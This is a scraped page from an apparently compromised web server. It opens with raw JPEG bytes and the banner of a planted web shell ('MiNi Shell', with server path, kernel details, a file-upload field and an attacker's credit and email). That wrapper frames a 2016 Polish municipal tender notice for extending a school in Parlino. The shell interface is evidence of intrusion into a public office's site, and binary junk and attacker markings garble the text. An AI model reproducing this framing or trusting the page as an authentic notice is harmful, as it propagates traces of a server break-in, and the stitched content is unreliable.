JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160118/11770-N-2016.html

<p class="kh_header"><b>Stara Dąbrowa: Rozbudowa Publicznej Szkoły Podstawowej w Parlinie, Gmina Stara Dąbrowa.</b><br>
<b>Numer ogłoszenia: 11770 - 2016; data zamieszczenia: 18.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Dąbrowa , 20, 73-112 Stara Dąbrowa, woj. zachodniopomorskie, tel. 0-91 5739820, 5739832, faks 0-91 5739822.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Publicznej Szkoły Podstawowej w Parlinie, Gmina Stara Dąbrowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Przedmiot zamówienia obejmuje:

I. Przebudowę i nadbudowie części budynku szkoły publicznej w Parlinie wraz z niezbędną infrastrukturą 
techniczną. Inwestycja prowadzona na działce geodezyjnej nr 98/3  w miejscowości Parlino, Gmina Stara Dąbrowa.
  II. Zakres prac obejmuje:
1) nadbudowę części budynku, 
2) roboty rozbiórkowe,
3) roboty ziemne,
4) roboty budowlano-montażowe,
5) roboty wykończeniowe,
6) roboty murarskie,
7) roboty instalacyjne sanitarne,
8) roboty instalacyjne elektryczne.
III. Nadbudowa dotyczy obiektu wolnostojącego. Nadbudowa będzie nad częścią parterową istniejącego budynku, budynek istniejący to obiekt bez podpiwniczenia, projektuje się nadbudowę o dachu jednospadowym (spadek dachu 3%).
1)Budynek w rzucie poziomym ukształtowany jest w formie wieloboku, o tradycyjnej architekturze, dostosowany do istniejącej zabudowy i otaczającego krajobrazu, harmonizujący z istniejącym otoczeniem. Technologia wykonawstwa tradycyjna.
2) Projektowany budynek spełnia wymagania, o których mowa w art. 5 ust. 1 ustawy Prawo Budowlane.
IV. Układ konstrukcyjny obiektu i zastosowane schematy:
1) Budynek posadowiony jest na istniejących fundamentach wykonanych w listopadzie 2001r. Wykonane fundamenty były przewidziane do dalszej rozbudowy szkoły o jedną kondygnacje (parter i I p). Nowe przeliczenie fundamentów pokazano w obliczeniach przy założeniu, że grunt jest mierny - piaski próchnicze I(D) =0,2,
2) Wg Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 24 września 1998 r w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych - na  działce występują proste warunki gruntowe i pierwsza kategoria geotechniczna.
 V. Rozwiązania konstrukcyjno-materiałowe podstawowych elementów konstrukcji obiektu:
1) Ściany zewnętrzne - ściany grubości 25 cm z cegły kratówki Porotherm kl. 15 MPa na zaprawie cem.-wap. 5MPa docieplone  od strony zewnętrznej styropianem samogasnącym lub płytami z wełny mineralnej typu Fasrock grubości 14 cm + tynk cienkowarstwowy na siatce z tworzywa sztucznego,
2)  Ściany wewnętrzne konstrukcyjne- grubości 25 cm z cegły ceramicznej kratówki Porotherm kl. 15MPa na zaprawie cem.-wap. 5MPa,
3) Ściany wewnętrzne działowe - grubości 12 cm z betonu komórkowego,
4) Obudowa szkieletowa szachtów instalacyjnych - obustronnie ruszt z kształtowników stalowych grubości 5cm z obustronnym obłożeniem płytami gipsowo - kartonowymi 12,5mm oraz wypełnieniem z wełny mineralnej-
w pomieszczeniach wilgotnych stosować płyty gipsowo-kartonowe wodoodporne (impregnowane),
5) Ścianki działowe w sanitariatach - typowe grubości 3 cm z płyty laminowanej,
6) Nadproża - typowe L19 i w przebiciach stalowe z dwuteowników IN
- nadproża wylewane z betonu B25 i stal AIIIN ,otulina zbrojenia 2,5 cm,
7) Strop -z płyt kanałowych. Wieńce betonu B25 i stal AIIIN ,otulina zbrojenia 2,5 cm
8) Dach - Stropodach wykonany z płyt korytkowych na ściankach ażurowych na podkładzie stropów kanałowych.
9) Kominy - wentylacyjne z pustaków ceramicznych o wymiarach 19x19x24 cm na zaprawie cem.-wap. 5MPa obmurowane cegłą ceramiczną dziurawką grub. 12cm na zaprawie cem.-wap. 5MPa; w pomieszczeniach WC należy wykonać wentylację mechaniczną - wentylatory typu EDM 160. Istniejące kominy należy nadmurować do projektowanej wysokości.
VI. Instalacje:
1) elektryczna z istniejącej instalacji,
2) centralnego ogrzewania - z istniejącej instalacji c.o.,
3) wod-kan - z istniejącej instalacji,
3) wentylacja grawitacyjna , w wc mechaniczna.
VII. Rozwiązania konstrukcyjno-materiałowe wewnętrznych i zewnętrznych przegród budowlanych obiektu.
 1) Izolacje:
-termiczna ścian, posadzek ze styropianu oraz stropodachu z wełny mineralnej,
-paroizolacja na stropie na 1 piętrem - z folii polietylenowej spawanej,
 2) Obróbki blacharskie dachu - z blachy ocynkowanej gr. 0,5 mm ,rynny i rury spustowe z blach stalowej  ocynk gr o,5 mm,
 3)Tynki i okładziny wewnętrzne, tynki gipsowe lub cementowo-wapienne,
 4) Tynki zewnętrzne, elewacja - ściany tynk silikonowy bezspoinowy z dodatkami przeciwko algom i grzybom wg wzornika sto lub inny równoważny, w kolorze istniejącego budynku szkoły. Cokół - płytki klinkierowe w kolorze brązowym, wiązanie wozówkowe z przesunięciem? cegły.
  5) Stolarka i ślusarka:
a) drzwiowa drewniana i aluminiowa,
b) stolarka okienna typowa PCV w kolorze białym, rozwieralno-uchylna, profil pięciokomorowy o współczynniku U<1,0 W/m2K; w górnych profilach ościeżnic automatyczne nawiewniki ciśnieniowe bez możliwości sterowania ręcznego z wkładką chroniąca przed owadami,
c) współczynnik szyb w oknach i drzwiach zewnętrznych = 1,1W/m2K,
d) szyby zespolone jednokomorowe z argonem.
  6) Parapety zewnętrzne z blachy powlekanej ciemno-brązowej, wewnętrzne: z duromarmuru.
  7) Malowanie -ściany wewnętrzne malowane farbami lateksowymi w kolorach pastelowych, sufity farbami akrylowymi.
 VIII. Podstawowe dane technologiczne związane z przeznaczeniem obiektu.
 1)  Nadbudowa części kondygnacji w budynku szkoły publicznej przeznaczona będzie na powiększenie istniejącej części do nauczania - sale dla zerówki, wraz z niezbędnym zapleczem,
 2) Instalacja wentylacyjna - do wentylacji nawiewnej wszystkich pomieszczeń służą okna rozszczelniane lub nawiewniki okienne umieszczone w dolnej lub górnej ramie okna,
 3) Obiekt to budynek użyteczności publicznej. Nie będzie wyposażony w żadne urządzenia czy instalacje przemysłowe.
 4) Zapotrzebowanie i jakość wody oraz ilość, jakość i sposób odprowadzania ścieków:
a) zaopatrzenie w wodę - istniejące,
b) odprowadzenie ścieków bytowych - istniejące.
 5) Emisja zanieczyszczeń gazowych, w tym zapachów, pyłowych i płynnych, ich rodzaj, ilość i zasięg rozprzestrzeniania się -nadbudowa nie będzie powodowała zanieczyszczeń gazowych, pyłowych i płynnych.
 6) Rodzaj i ilość wytwarzanych odpadów - inwestycja nie będzie wytwarzać odpadów niebezpiecznych. Gromadzenie odpadów bytowych całego z terenu działki w ilości jak z gospodarstwa domowego, w szczelnych pojemnikach na terenie działki i wywóz w sposób zorganizowany przez wyspecjalizowaną jednostkę do miejsca odzysku lub unieszkodliwiania, przy uwzględnieniu selektywnej zbiórki odpadów.
7) Właściwości akustyczne oraz emisja drgań, a także promieniowanie, w szczególności jonizujące, pole elektromagnetyczne i inne zakłócenia, wraz z zasięgiem ich rozprzestrzeniania się -  inwestycja nie będzie powodowała podobnych zakłóceń.
8) Wpływ obiektu budowlanego na istniejący drzewostan, powierzchnię ziemi, w tym glebę, wody powierzchniowe i podziemne. Przyjęte w projekcie architektoniczno-budowlanym rozwiązania przestrzenne, funkcjonalne i techniczne, nie mają negatywnego wpływu obiektu budowlanego na środowisko przyrodnicze, zdrowie ludzi i inne obiekty budowlane, zgodnie z odrębnymi przepisami.
 IX. Warunki ochrony przeciwpożarowej.
 1) Kwalifikacja obiektu:
- budynek posiada dwie konsygnacje, wysokość <12m - niski (N),
  kategoria zagrożenia ludzi: parter i I piętro ZL III.
 2) Odporność pożarowa i ogniowa:
- dla całości wymagana klasa odporności pożarowej D,
- przy wskazanej klasie odporności pożarowej, elementy budynku muszą posiadać cechę NRO.
- Wydzielenie stref pożarowych - REI 60, przejścia i przepusty EI 60,
-  Materiały wystroju, podłogi i wyposażenia wnętrz co najmniej trudno zapalne.
 3) Strefy pożarowe:
- Obiekt podzielony jest na jedną strefę pożarową.
 4) Ewakuacja:
- zapewnione są dwa wyjścia na zewnątrz.
 5) Urządzenia przeciwpożarowe i zabezpieczenia:
- pożarowy wyłącznik prądu przy wejściu głównym- istniejącym  wyposażenie w gaśnice wg normatywu 2kg   masy środka gaśniczego na każde 100m2.
 6) Zaopatrzenie w wodę ppoż:
- wymagana ilość wody do celów przeciwpożarowych - 10 dm3/s - zasilanie  realizowane z hydrantu na sieci komunalnej odległość do budynku nie przekroczy 75m,
- materiały, elementy budynku, instalacje, systemy i urządzenia przeciwpożarowe zastosowane w obiekcie muszą posiadać prawem przewidziane dopuszczenia, adekwatnie do wymaganych cech i właściwości pożarowych, projekty wykonawcze urządzeń przeciwpożarowych podlegają uzgodnień z rzeczoznawcą ds. zabezpieczeń przeciwpożarowych, na ITB.
 7) Obszar oddziaływania:
- inwestycja oddziałuje na działkę nr geod.98/3 i sąsiednią 98/5.
3. Materiały budowlane oraz elementy prefabrykowane winny odpowiadać atestom technicznym oraz ustaleniom odnośnych norm. Roboty budowlane winny być wykonane zgodnie z zasadami sztuki budowlanej, normami i warunkami technicznymi oraz pod kierunkiem osoby uprawnionej do kierowania i nadzorowania robót. Przekucia instalacyjne nie mogą naruszać elementów konstrukcyjnych. Przy konstrukcjach żelbetowych posiadających skomplikowane zbrojenie, należy przed przystąpieniem do robót, sporządzić szkice rysunkowe zbrojenia, celem uniknięcia pomyłek w wykonawstwie. Wszelkie przegrody budowlane wykonać zgodnie z Polskimi Normami. Dopuszcza się rozwiązania alternatywne w zastosowaniu materiałów, zgodnie z załączoną normą i po wcześniejszym przeliczeniu obciążeń statycznych. Elementy i roboty nie objęte niniejszym opracowaniem a mogące wystąpić w trakcie prowadzenia robót budowlanych związanych z projektowanym budynkiem, w przypadkach wątpliwych należy uzgodnić z biurem autorskim..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.25.00-6, 45.26.10.00-4, 45.43.10.00-7, 45.44.00.00-3, 45.42.10.00-4, 45.32.10.00-3, 45.43.21.11-5, 45.40.00.00-1, 45.43.21.11-5, 45.33.10.00-6, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 81.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium. 
2.Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 5 000, 00 zł 
(słownie zł: pięć tysięcy 00/100).
3.Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
a)w pieniądzu, przelewem na rachunek bankowy: 
Bank PKO BP S.A. w Stargardzie Szczecińskim
Nr 39 1020 4867 0000 1502 0007 9905
b)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
c)w gwarancjach bankowych, 
d)w gwarancjach ubezpieczeniowych,
e)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
4.Sposób przekazania wadium - dokument potwierdzający wniesienie wadium należy dołączyć do oferty.
5.Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
6.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
7.W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich pięciu lat przed upływem  terminu  składania  ofert, a jeżeli  okres prowadzenia  działalności   jest krótszy - w tym okresie, minimum jedną robotę    budowlaną polegającą na budowie lub modernizacji budynku użyteczności publicznej o wartości minimalnej 350 000,00 zł brutto, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgonie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować minimum 1 osobą odpowiedzialną za kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej, elektrycznej i sanitarnej.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeśli wykonawca przedstawi zamawiającemu, opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 350 000,00 zł.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy, 2) Kosztorys ofertowy, 3) Dokument potwierdzający wniesienie wadium, 4) Projekt umowy parafowany przez wykonawcę na każdej ze stron</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - Termin wykonania - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staradabrowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starej Dąbrowie 20, 73-112 Stara Dąbrowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2016 godzina 10:30, miejsce: Sekretariat ( pokój nr 15) w Urzędzie Gminy w Starej Dąbrowie 20, 73-112 Stara Dąbrowa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobą uprawnioną do bezpośredniego kontaktowania się z wykonawcami jest: Pan
­Krystian Tylus - tel. 91 573 98 24;  faks: 91 573 98 22; e-mail:  bud@staradabrowa.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com